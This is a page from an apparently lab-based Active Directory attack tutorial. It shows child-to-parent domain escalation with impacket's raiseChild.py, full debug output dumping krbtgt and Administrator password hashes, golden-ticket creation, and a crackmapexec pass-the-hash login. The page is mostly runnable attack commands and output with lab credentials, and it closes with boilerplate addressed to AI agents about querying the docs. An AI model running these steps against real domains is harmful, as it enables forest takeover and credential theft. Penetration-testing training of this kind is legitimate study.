# RaiseMeUp - Escalate with impacket raiseChild

* Ok now imagine you have pwn the domain north.newyork.local you have dump the ntds and you got all the NT hash of all the north domain users.

> As said by Microsoft the domain trust is not a security boundary

<figure><img src="/files/BbNPCkBPH0oV3ZAuAyfe" alt=""><figcaption></figcaption></figure>

### RaiseMeUp - Escalate with impacket raiseChild <a href="#raisemeup---escalate-with-impacket-raisechild" id="raisemeup---escalate-with-impacket-raisechild"></a>

* To escalate from child to parent the simplest way is with impacket raiseChild.py script, this will do all the work for us.

```
raiseChild.py north.newyork.local/fernando.alonzo:IDr1R3allyF@sTF1!
```

<figure><img src="/files/6gLiBo0YzT0KI0WUga41" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/VfjWS22qQ3Slakv1b6BO" alt=""><figcaption></figcaption></figure>

```
$raiseChild.py north.newyork.local/fernando.alonzo:IDr1R3allyF@sTF1! -debug -ts
Impacket v0.10.1.dev1+20230216.13520.d4c06e7f - Copyright 2022 Fortra

[2023-03-07 12:38:36] [+] Impacket Library Installation Path: /usr/local/lib/python3.9/dist-packages/impacket-0.10.1.dev1+20230216.13520.d4c06e7f-py3.9.egg/impacket
[2023-03-07 12:38:36] [+] Calling NRPC DsrGetDcNameEx()
[2023-03-07 12:38:36] [*] Raising child domain north.newyork.local
[2023-03-07 12:38:36] [*] Forest FQDN is: newyork.local
[2023-03-07 12:38:36] [*] Raising north.newyork.local to newyork.local
[2023-03-07 12:38:36] [+] Calling LSAT hLsarQueryInformationPolicy2()
[2023-03-07 12:38:36] [*] newyork.local Enterprise Admin SID is: S-1-5-21-620482180-1620433373-1814187987-519
[2023-03-07 12:38:36] [*] Getting credentials for north.newyork.local
[2023-03-07 12:38:36] [+] Decrypting hash for user: CN=krbtgt,CN=Users,DC=north,DC=newyork,DC=local
north.newyork.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b215421b300eb02228f7b4e8f8414201:::
north.newyork.local/krbtgt:aes256-cts-hmac-sha1-96s:b85d7acc1aba6e1edb419d7b6735eeeb4014eb43731e9b4df9f525cb0d036f2e
[2023-03-07 12:38:36] [+] Trying to connect to KDC at NORTH.NEWYORK.LOCAL
[2023-03-07 12:38:36] [+] Trying to connect to KDC at NORTH.NEWYORK.LOCAL
[2023-03-07 12:38:36] [+] VALIDATION_INFO before making it gold
[2023-03-07 12:38:36] [+] Getting TGS for SPN cifs/NYC
[2023-03-07 12:38:36] [+] Trying to connect to KDC at NORTH.NEWYORK.LOCAL
[2023-03-07 12:38:36] [+] Trying to connect to KDC at NEWYORK.LOCAL
[2023-03-07 12:38:36] [*] Getting credentials for newyork.local
[2023-03-07 12:38:36] [+] 192.168.56.10 is NYC.newyork.local
[2023-03-07 12:38:36] [+] Trying to connect to KDC at NORTH.NEWYORK.LOCAL
[2023-03-07 12:38:36] [+] Trying to connect to KDC at NEWYORK.LOCAL
[2023-03-07 12:38:36] [+] Decrypting hash for user: CN=krbtgt,CN=Users,DC=newyork,DC=local
newyork.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9bd3def911c72eaa484fc6a302f3a08b:::
newyork.local/krbtgt:aes256-cts-hmac-sha1-96s:4860355d58ab70fb7446b46de1e21a430ff34234bda82c2498976f59cb5a7b48
[2023-03-07 12:38:36] [*] Target User account name is Administrator
[2023-03-07 12:38:36] [+] 192.168.56.10 is NYC.newyork.local
[2023-03-07 12:38:36] [+] Trying to connect to KDC at NORTH.NEWYORK.LOCAL
[2023-03-07 12:38:36] [+] Trying to connect to KDC at NEWYORK.LOCAL
[2023-03-07 12:38:36] [+] Decrypting hash for user: CN=Administrator,CN=Users,DC=newyork,DC=local
newyork.local/Administrator:500:aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e:::
newyork.local/Administrator:aes256-cts-hmac-sha1-96s:bdb1a615bc9d82d2ab21f09f11baaef4bc66c48efdd56424e1206e581e4dd827
```

* This create a golden ticket for the forest enterprise admin.
* Log into the forest and get the target info (default administrator RID: 500)
* All the job is done with one command, if you are lazy you don’t even need to understand x)

Authenticate with to verify the dump has is good

```
crackmapexec smb 192.168.56.10 -u Administrator -H ":c66d72021a2d4744409969a581a1705e" -d newyork.local
```

<figure><img src="/files/m9XPDBlDS5UFU553cCIx" alt=""><figcaption></figcaption></figure>

smbexec.py whoami????

<figure><img src="/files/9Na1azPygujzljLRdLE0" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://watchdogsacademy.gitbook.io/attacking-active-directory/trust/domain-trust-child-parent-north.newyork.local-greater-than-newyork.local/raisemeup-escalate-with-impacket-raisechild.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.